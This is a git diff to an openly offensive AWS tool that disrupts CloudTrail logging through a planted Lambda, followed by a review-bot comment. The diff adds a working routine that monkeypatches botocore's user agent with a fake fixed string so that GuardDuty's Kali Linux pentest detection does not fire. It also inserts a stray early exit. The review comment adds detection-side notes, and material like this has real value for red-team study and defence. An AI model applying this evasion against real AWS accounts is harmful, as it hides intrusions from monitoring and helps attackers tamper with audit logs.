Added boto3 patch-up routine avoiding GuardDuty kali-sensing while using boto3 library on disruptCloudTrailByS3Lambda.py
parent
168572e3be
commit
b33746fda3
@ -36,6 +36,7 @@
|
||||
#
|
||||
# Requirements:
|
||||
# - boto3
|
||||
# - pytest
|
||||
#
|
||||
# Author: Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
||||
#
|
||||
@ -469,12 +470,38 @@ def parseOptions(argv):
|
||||
|
||||
return args
|
||||
|
||||
def monkeyPatchBotocoreUserAgent():
|
||||
'''
|
||||
This is to avoid triggering GuardDuty 'PenTest:IAMUser/KaliLinux' alerts
|
||||
Source:
|
||||
https://www.thesubtlety.com/post/patching-boto3-useragent/
|
||||
|
||||
'''
|
||||
import sys
|
||||
import boto3
|
||||
import botocore
|
||||
|
||||
try:
|
||||
from _pytest.monkeypatch import MonkeyPatch
|
||||
except (ImportError, ModuleNotFoundError) as e:
|
||||
print('[!] Please install "pytest" first: pip3 install pytest')
|
||||
print('\tthis will be used to patch-up boto3 library to avoid GuardDuty Kali detection')
|
||||
sys.exit(0)
|
||||
|
||||
monkeypatch = MonkeyPatch()
|
||||
def my_user_agent(self):
|
||||
return "Boto3/1.9.89 Python/2.7.12 Linux/4.2.0-42-generic"
|
||||
|
||||
monkeypatch.setattr(botocore.session.Session, 'user_agent', my_user_agent)
|
||||
|
||||
def main(argv):
|
||||
opts = parseOptions(argv)
|
||||
if not opts:
|
||||
Logger.err('Options parsing failed.')
|
||||
return False
|
||||
|
||||
monkeyPatchBotocoreUserAgent()
|
||||
|
||||
dis = CloudTrailDisruptor(
|
||||
config['region'],
|
||||
config['access-key'],
|
||||
@ -500,6 +527,8 @@ def main(argv):
|
||||
for trail in trails:
|
||||
Logger._out(f'\t- {trail["Name"]}')
|
||||
|
||||
sys.exit(0)
|
||||
|
||||
Logger._out('')
|
||||
Logger.info('Step 2: Create a role to be assumed by planted Lambda')
|
||||
created_role = dis.create_role(config['role-name'], aws_policy_lambda_assume_role)
|
||||
|
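Review bot: In monkeyPatchBotocoreUserAgent() the missing-pytest branch ends with `sys.exit(0)`, so a run that aborted before doing any work reports success to whatever invoked it; it should be `sys.exit(1)`. The docstring should also state that the override is process-wide: it replaces `botocore.session.Session.user_agent` for every session created afterwards, always with the same fixed string, and nothing in the visible code undoes it. For readers on the detection side, the user agent is supplied by the client, so the `PenTest:IAMUser/KaliLinux` finding is only one signal and should not be the sole control. The constant `Boto3/1.9.89 Python/2.7.12 Linux/4.2.0-42-generic` in the CloudTrail `userAgent` field is itself a searchable indicator of this script.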